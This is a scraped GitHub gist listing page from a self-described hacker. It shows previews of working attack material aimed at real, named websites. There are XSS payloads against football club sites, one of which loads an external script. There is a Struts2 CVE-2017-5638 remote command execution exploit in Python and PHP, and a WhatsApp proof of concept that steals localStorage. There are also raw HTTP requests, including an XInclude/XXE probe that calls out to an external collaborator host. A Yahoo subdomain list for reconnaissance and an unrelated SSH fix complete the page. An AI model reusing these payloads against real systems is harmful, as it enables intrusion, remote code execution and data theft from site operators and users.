Skip to content

Instantly share code, notes, and snippets.

View random-robbie's full-sized avatar
💭
Hacking!

Robbie random-robbie

💭
Hacking!
1.8k followers · 153 following
View GitHub Profile
@random-robbie
random-robbie / everton
Created February 8, 2017 09:36
everton fc xss
http://www.evertonfc.com/search?q=fdgdgfdg'"--!><Iframe /SrcDoc=%26lt;Svg/O%26%23x6Eload%26equals;confirm%26lpar;1%26rpar;%26gt;>
@random-robbie
random-robbie / fcbarcelona.com
Created February 8, 2017 09:51
fcbarcelona.com
https://www.fcbarcelona.com/search?keywords="/> </div> </div><script src=https://openbugbounty.org/1.js>#p_fcb_cercador_WAR_fcb_components_ INSTANCE_dRUgFk4Ryv2u
https://www.fcbarcelona.com/search?keywords=" autofocus onfocus="alert('OPENBUGBOUNTY')
https://foundation.fcbarcelona.com/search?keywords="/> </div> </div><script src=https://openbugbounty.org/1.js>#p_fcb_cercador_WAR_fcb_components_ INSTANCE_dRUgFk4Ryv2u
@random-robbie
random-robbie / struts2_S2-045.py
Last active March 11, 2017 10:52
2017-5638 - Apache Struts2 S2-045
#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import requests
import httplib
from markupsafe import Markup, escape
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
@random-robbie
random-robbie / struts2_S2-045.php
Last active March 11, 2017 11:21
struts2_S2-045.php
<?php
//CVE: 2017-5638 - Apache Struts2 S2-045 in PHP by Robbie Wiggins
$url = ""
$command = ""
$req = curl_init($url);
curl_setopt($req, CURLOPT_RETURNTRANSFER, true);
curl_setopt($req, CURLOPT_HTTPHEADER, array("Connection: close","User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0","Accept: */*","Content-Type: Content-Type:%{(\x23_='multipart/form-data').(\[email protected]@DEFAULT_MEMBER_ACCESS).(\x23_memberAccess?(\x23_memberAccess=\x23dm):((\x23container=\x23context['com.opensymphony.xwork2.ActionContext.container']).(\x23ognlUtil=\x23container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(\x23ognlUtil.getExcludedPackageNames().clear()).(\x23ognlUtil.getExcludedClasses().clear()).(\x23context.setMemberAccess(\x23dm)))).(\x23cmd=''.$command.'').(\x23iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(\x23cmds=(\x23iswin?{'cmd.exe','/c',\x23cmd}:{'/bin/bash','-c',\x23cmd})).(\x23p=new java.lang.ProcessBuilder(\x23
@random-robbie
random-robbie / POC.html
Last active July 13, 2018 18:41
checkpoint whatsapp exploit steal localstorage.
<html>
<header>
<title>WhatsApp</title>
<script>
function GetStorage ()
{
var values = {};
var keys = Object.keys (localStorage);
var i = keys.length;
while (i --)
@random-robbie
random-robbie / Fix
Created March 21, 2017 08:35
kex error : no match for method server host key algo: server [ssh-rsa,ssh-dss,ecdsa-sha2-nistp256], client [ssh-ed25519] notepad++
1) nano /etc/ssh/sshd_config
2) Add this line'HostKey /etc/ssh/ssh_host_ed25519_key'
3) ssh-keygen -q -f /etc/ssh/ssh_host_ed25519_key -N "" -t ed25519
4) /etc/init.d/dropbear force-reload
@random-robbie
random-robbie / yahoo.txt
Last active March 24, 2017 10:07
yahoo sub domains
*.0.facebook.com.m.yahoo.com
*.26.99.99.wap.yahoo.com
*.33.150.0.facebook.com.m.yahoo.com
*.99.99.wap.yahoo.com
*.com.htmluk.wap.yahoo.com
*.com252far.m.yahoo.com
*.com252fdns252f99.wap.yahoo.com
*.com252fid.m.yahoo.com
*.com252fwww.wap.yahoo.com
*.com252fwww.y.m.yahoo.com
@random-robbie
random-robbie / gist:a3e1a66056e55d1c918ae042286f3a8f
Created April 8, 2017 15:02
POST /4130/ HTTP/1.1
Host: www.en.octrooigemachtigde.nl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.en.octrooigemachtigde.nl/4130/
Content-Type: multipart/form-data; boundary=--------410995939
Content-Length: 739
Cookie: reftypes=%5B%22Userprofile%22%5D; TW_S_ID=ncgqt7611gbn0sbj4qbvp0dkf2
@random-robbie
random-robbie / 500 with standard class output
Created April 8, 2017 16:01
Intresting
POST /findcompany HTTP/1.1
Host: www.en.octrooigemachtigde.nl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.en.octrooigemachtigde.nl/
Content-Type: application/x-www-form-urlencoded
Content-Length: 110
Cookie: reftypes=%5B%22Userprofile%22%5D; TW_S_ID=ncgqt7611gbn0sbj4qbvp0dkf2
@random-robbie
random-robbie / XXE
Created April 9, 2017 09:32
GET /onderwerpen_a_z/dtn/%3ccic%20xmlns%3axi%3d%22http%3a//www.w3.org/2001/XInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a//ioayleb1wivjm491crlfrd0nmes5k283wuohe53.burpcollaborator.net/foo%22/%3e%3c/cic%3e?select=2&q=&df=01-01-0001&dt=31-12-9999&dctermsType=&kw=&SortBy=Datum& HTTP/1.1
Host: www.nctv.nl
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=ddev3t12jg44zdntrg4gcdbk; TAFSessionId=tridion_3848c4d0-be23-45fc-be53-3622aebc2313; TAFTrackingId=tridion_f9793e47-59eb-4071-969b-595b70ba5b16; __AntiXsrfToken=ad6cd04303354aeebc7a0b15e4a702dc; _pk_id.1.b732=99dde3f61eed5e35.1491726140.1.1491726140.1491726140.; _pk_ref.1.b732=%5B%22%22%2C%22%22%2C1491726140%2C%22https%3A%2F%2Fwww.google.co.uk%2F%22%5D; _pk_ses.1.b732=*
Connection: close